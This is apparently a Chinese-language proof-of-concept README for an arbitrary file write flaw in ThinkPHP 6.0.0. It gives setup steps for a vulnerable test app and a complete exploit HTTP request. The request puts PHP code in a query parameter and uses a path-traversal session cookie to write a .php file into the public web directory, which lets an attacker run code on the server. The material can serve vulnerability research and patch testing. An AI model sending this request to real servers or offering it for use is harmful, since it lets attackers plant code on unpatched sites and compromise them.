README.md 1.5 KB

thinkphp6 任意文件写入

环境

composer create-project topthink/think tp60

将 tp60/composer.json 文件的 "topthink/framework": "^6.0.0" 改成 6.0.0 版本,并执行如下命令。

composer update

./think run --host=0.0.0.0 --port=8000

前提

app/middleware.php 开启session功能

<?php
// 全局中间件定义文件
return [
    // 全局请求缓存
    // \think\middleware\CheckRequestCache::class,
    // 多语言加载
    // \think\middleware\LoadLangPack::class,
    // Session初始化
//     \think\middleware\SessionInit::class
    \think\middleware\SessionInit::class
];

app/controller/Index.php

<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {

        session('thinkphp', $_GET['test']);
        return 'Thinkphp 任意文件操作';
    }
}

利用

GET /index?test=<?php%20phpinfo();?>// HTTP/1.1
Host: pentest.com:8000
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Connection: close
cookie:PHPSESSID=../../../../public/test12325.php
X-XSS-Protection:0

1

2